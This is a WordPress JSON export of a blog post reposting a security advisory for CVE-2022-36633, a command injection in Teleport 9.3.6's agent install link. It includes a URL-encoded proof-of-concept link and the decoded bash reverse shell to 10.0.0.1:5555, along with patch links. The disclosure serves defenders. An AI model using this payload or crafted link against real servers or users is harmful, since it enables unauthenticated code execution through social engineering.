{"id":29495,"date":"2022-08-23T18:19:18","date_gmt":"2022-08-23T14:19:18","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168137\/teleport936-exec.txt"},"modified":"2022-08-24T08:21:41","modified_gmt":"2022-08-24T03:51:41","slug":"teleport-9-3-6-command-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/teleport-9-3-6-command-injection\/","title":{"rendered":"Teleport 9.3.6 Command Injection"},"content":{"rendered":"<p dir=\"ltr\">Description:Teleport 9.3.6 is vulnerable to Command injection leading to Remote<br \/>\nCode Execution. An attacker can craft a malicious ssh agent<br \/>\ninstallation link by URL encoding a bash escape with carriage return<br \/>\nline feed. This url encoded payload can be used in place of a token and<br \/>\nsent to a user in a social engineering attack. This is fully<br \/>\nunauthenticated attack utilizing the trusted teleport server to deliver<br \/>\nthe payload.<\/p>\n<p dir=\"ltr\">Additional Information:https:\/\/goteleport.com\/<br \/>\nhttps:\/\/github.com\/gravitational\/teleport<br \/>\nhttps:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-36633<\/p>\n<p dir=\"ltr\">Vulnerability Type: otherCommand injection leading to Remote Code Execution<\/p>\n<p dir=\"ltr\">Vendor of Product:Teleport &#8211; https:\/\/goteleport.com\/<br \/>\nAffected software version: Teleport version &lt; v10.1.2<\/p>\n<p dir=\"ltr\">Affected Component:https:\/\/teleport.examplesite.com\/scripts\/*INJECTION-POINT*\/install-node.sh?method=iam &lt;https:\/\/teleport.site.com\/scripts\/*INJECTION-POINT*\/install-node.sh?method=iam&gt;<\/p>\n<p dir=\"ltr\">Attack Type:Remote<\/p>\n<p dir=\"ltr\">Impact:Code Execution<br \/>\nImpact Other:This vulnerability allows an attacker to inject code into a bash script without authentication, and craft a legitimate link hosted on the teleport server to use in social engineering attacks. When a user executes the command to install an teleport SSH agent with the crafted link, it will install the teleport agent and without the users knowledge, execute malicious code in the background.<\/p>\n<p dir=\"ltr\">Attack Vectors:An attacker can craft a malicious ssh agent installation link by URL encoding a bash escape with carriage return line feed. This url encoded payload can be used in place of a token and sent to a user in a social engineering attack. This is fully unauthenticated attack utilizing the trusted teleport server to deliver the payload.<\/p>\n<p dir=\"ltr\">Example POC payload: https:\/\/teleport.site.com\/scripts\/%22%0a%2f%62%69%6e%2f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%30%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23\/install-node.sh?method=iam &lt;https:\/\/teleport.site.com\/scripts\/%22%0a%2fbin%2fbash%20-l%20%3e%20%2fdev%2ftcp%2f10.0.0.1%2f5555%200%3c%261%202%3e%261%20%23\/install-node.sh?method=iam&gt;<\/p>\n<p dir=\"ltr\">Decoded payload:<br \/>\n&#8221;<br \/>\n\/bin\/bash -l &gt; \/dev\/tcp\/10.0.0.1\/5555 0&lt;&amp;1 2&gt;&amp;1 #<\/p>\n<p dir=\"ltr\">Patch information:https:\/\/goteleport.com\/docs\/changelog\/#1012<br \/>\nhttps:\/\/github.com\/gravitational\/teleport\/pull\/14944<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<p dir=\"ltr\">Discoverers:<br \/>\nBrandon Roach &amp; Brian Landrum<\/p>\n<p dir=\"ltr\">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Description:Teleport 9.3.6 is vulnerable to Command injection leading to Remote Code Execution. An attacker can craft a malicious ssh agent installation link by URL encoding a bash escape with carriage return line feed. This url encoded payload can be used in place of a token and sent to a user in a social engineering attack. &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-29495","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29495","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=29495"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29495\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=29495"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=29495"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=29495"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}